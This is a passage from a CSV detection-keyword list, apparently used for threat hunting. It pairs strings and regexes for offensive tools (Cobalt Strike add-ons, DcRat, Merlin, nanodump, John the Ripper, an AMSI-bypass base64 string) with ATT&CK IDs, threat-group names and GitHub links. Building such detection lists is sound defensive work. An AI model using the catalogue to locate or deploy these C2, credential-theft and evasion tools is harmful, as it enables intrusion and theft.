TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/Quser-BOF","1","1","N/A","10","10","85","10","2023-03-22T17:07:02Z","2021-04-01T15:19:50Z" "*QW1zaVNjYW5CdWZmZXI=*",".{0,1000}QW1zaVNjYW5CdWZmZXI\=.{0,1000}","offensive_tool_keyword","base64","AMSI Bypass AmsiScanBuffer in base64","T1562.001","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*qwqdanchun*",".{0,1000}qwqdanchun.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","890","331","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*qwqdanchun/DcRat*",".{0,1000}qwqdanchun\/DcRat.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","890","331","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*QWRkLU1lbWJlciBOb3RlUHJvcGVydHkgLU5hbWUgVmlydHVhbFByb3RlY3QgLVZhbHVlICRWaXJ0dWFsUHJvdGVjdA*",".{0,1000}QWRkLU1lbWJlciBOb3RlUHJvcGVydHkgLU5hbWUgVmlydHVhbFByb3RlY3QgLVZhbHVlICRWaXJ0dWFsUHJvdGVjdA.{0,1000}","offensive_tool_keyword","mimikatz","invoke mimiaktz string found used by the tool EDRaser ","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","172","29","2024-04-06T17:42:40Z","2023-08-10T04:30:45Z" "*QXh4OEF4eDhBeHg4QXh4OA==*",".{0,1000}QXh4OEF4eDhBeHg4QXh4OA\=\=.{0,1000}","offensive_tool_keyword","cobaltstrike","ShellCode_Loader - Msf&CobaltStrike Antivirus ShellCode loader. Shellcode_encryption - Antivirus Shellcode encryption generation tool. currently tested for Antivirus 360 & Huorong & Computer Manager & Windows Defender (other antivirus software not tested).","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Axx8/ShellCode_Loader","1","1","N/A","10","10","401","48","2022-09-20T07:24:25Z","2022-09-02T14:41:18Z" "*r00t0v3rr1d3/merlin*",".{0,1000}r00t0v3rr1d3\/merlin.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*r00t-3xp10it*",".{0,1000}r00t\-3xp10it.{0,1000}","offensive_tool_keyword","Github Username","Pentest hosting multiple offensive tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*r00t-3xp10it/venom/master/bin/void.zip*",".{0,1000}r00t\-3xp10it\/venom\/master\/bin\/void\.zip.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*r0oth3x49/ghauri*",".{0,1000}r0oth3x49\/ghauri.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","1","N/A","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "*r0oth3x49/Tor.git*",".{0,1000}r0oth3x49\/Tor\.git.{0,1000}","offensive_tool_keyword","Tor","Tor is a python based module for using tor proxy/network services on windows - osx - linux with just one click.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Defense Evasion - Data Exfiltration","https://github.com/r0oth3x49/Tor","1","1","N/A","N/A","2","147","39","2018-04-21T10:55:00Z","2016-09-22T11:22:33Z" "*r0oth3x49@gmail.com*",".{0,1000}r0oth3x49\@gmail\.com.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","0","N/A","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "*r1cksec/thoth*",".{0,1000}r1cksec\/thoth.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","1","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*r2pm -i dirtycow*",".{0,1000}r2pm\s\-i\sdirtycow.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/nowsecure/dirtycow","1","0","N/A","N/A","1","92","25","2019-05-13T13:17:31Z","2016-10-22T14:00:37Z" "*r3F0rM47(listt*",".{0,1000}r3F0rM47\(listt.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*r4wd3r/RID-Hijacking*",".{0,1000}r4wd3r\/RID\-Hijacking.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","1","N/A","9","2","166","47","2022-09-02T08:43:14Z","2018-07-14T18:48:51Z" "*r4wd3r/Suborner*",".{0,1000}r4wd3r\/Suborner.{0,1000}","offensive_tool_keyword","Suborner","The Invisible Account Forger - A simple program to create a Windows account you will only know about ","T1098 - T1175 - T1033","TA0007 - TA0008 - TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/Suborner","1","1","N/A","N/A","5","463","60","2022-09-02T09:04:46Z","2022-04-26T00:12:58Z" "*Radare2*",".{0,1000}Radare2.{0,1000}","offensive_tool_keyword","Radare2","r2 is a rewrite from scratch of radare in order to provide a set of libraries and tools to work with binary files.Radare project started as a forensics tool. a scriptable command-line hexadecimal editor able to open disk files. but later added support for analyzing binaries. disassembling code. debugging programs. attaching to remote gdb servers","T1057 - T1064 - T1059 - T1202","TA0002 - TA0008 - TA0001","N/A","N/A","Information Gathering","https://github.com/radareorg/radare2","1","0","N/A","N/A","10","19645","2938","2024-05-01T18:02:45Z","2012-07-03T07:42:26Z" "*radius2john.pl*",".{0,1000}radius2john\.pl.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*radius2john.py*",".{0,1000}radius2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*RagingRotator-main.*",".{0,1000}RagingRotator\-main\..{0,1000}","offensive_tool_keyword","RagingRotator","A tool for carrying out brute force attacks against Office 365 with built in IP rotation use AWS gateways.","T1110 - T1027 - T1071 - T1090","TA0006 - TA0005 - TA0001","N/A","N/A","Credential Access","https://github.com/nickzer0/RagingRotator","1","1","N/A","10","1","74","5","2024-02-05T21:46:54Z","2023-09-01T15:19:38Z" "*RAI/ase_docker*",".{0,1000}RAI\/ase_docker.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","290","54","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" "*rai-attack-servers.*",".{0,1000}rai\-attack\-servers\..{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","290","54","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" "*Raikia/SMBCrunch*",".{0,1000}Raikia\/SMBCrunch.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Raikia/SMBCrunch","1","1","N/A","9","2","162","26","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z" "*RainbowCrack*",".{0,1000}RainbowCrack.{0,1000}","offensive_tool_keyword","RainbowCrack","The RainbowCrack tool is a hash cracker that makes use of a large-scale time-memory trade-off. A traditional brute force cracker tries all possible plaintexts one by one. which can be time consuming for complex passwords. RainbowCrack uses a time-memory trade-off to do all the cracking-time computation in advance and store the results in so-called rainbow tables. It does take a long time to precompute the tables but RainbowCrack can be hundreds of times faster than a brute force cracker once the precomputation is finished. For downloads and more information. visit the RainbowCrack homepage","T1110 - T1208 - T1212 - T1609","TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Credential Access","http://project-rainbowcrack.com/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*rai-redirector-dns*",".{0,1000}rai\-redirector\-dns.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","290","54","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" "*rai-redirector-http*",".{0,1000}rai\-redirector\-http.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","290","54","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" "*raiseChild.py -target-exec *",".{0,1000}raiseChild\.py\s\-target\-exec\s.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*raiseChild.py*",".{0,1000}raiseChild\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*rajkumardusad/onex*",".{0,1000}rajkumardusad\/onex.{0,1000}","offensive_tool_keyword","onex","Onex is a package manager for hacker's. Onex manage more than 400+ hacking tools that can be installed on single click","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/rajkumardusad/onex","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*rajkumardusad/Tool-X*",".{0,1000}rajkumardusad\/Tool\-X.{0,1000}","offensive_tool_keyword","Tool-X","Tool-X is a Kali Linux hacking tools installer for Termux and linux system. Tool-X was developed for Termux and linux based systems. Using Tool-X you can install almost 370+ hacking tools in Termux (android) and other Linux based distributions. Now Tool-X is available for Ubuntu Debian etc.","T1212 - T1566 - T1550 - T1133","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/rajkumardusad/Tool-X","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*RalfHacker/Kerbeus-BOF*",".{0,1000}RalfHacker\/Kerbeus\-BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","1","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*RalphDesmangles/22f580655f479f189c1de9e7720776f1*",".{0,1000}RalphDesmangles\/22f580655f479f189c1de9e7720776f1.{0,1000}","offensive_tool_keyword","GetLoggedOnUsersRegistry","PoC To enumerate logged on users on a remote system using the winreg named pipe","T1087 - T1018 - T1057","TA0007 - TA0003 - TA0004","N/A","N/A","Lateral Movement - Discovery","https://gist.github.com/RalphDesmangles/22f580655f479f189c1de9e7720776f1","1","1","N/A","8","8","N/A","N/A","N/A","N/A" "*RAMDOMdd28f0dcd9779315ee130deb565dbf315587f1611e54PASSWORD*",".{0,1000}RAMDOMdd28f0dcd9779315ee130deb565dbf315587f1611e54PASSWORD.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","126","18","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z" "*random_c2_profile*",".{0,1000}random_c2_profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*random_c2profile.*",".{0,1000}random_c2profile\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*random_user_agent.params*",".{0,1000}random_user_agent\.params.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*random_user_agent.user_agent*",".{0,1000}random_user_agent\.user_agent.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*randomalice1986@*",".{0,1000}randomalice1986\@.{0,1000}","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","1","email user name","3","10","4552","734","2024-04-03T20:19:09Z","2015-06-11T12:24:17Z" "*-RandomAttackPath -Token*",".{0,1000}\-RandomAttackPath\s\-Token.{0,1000}","offensive_tool_keyword","badazure","BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/mvelazc0/BadZure/","1","0","N/A","5","4","350","20","2023-12-04T16:14:07Z","2023-05-05T04:52:21Z" "*randombob1986@*",".{0,1000}randombob1986\@.{0,1000}","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","1","email user name","3","10","4552","734","2024-04-03T20:19:09Z","2015-06-11T12:24:17Z" "*randomize_sw2_seed.py*",".{0,1000}randomize_sw2_seed\.py.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*Ransom:Win32/Sodinokibi*",".{0,1000}Ransom\:Win32\/Sodinokibi.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - 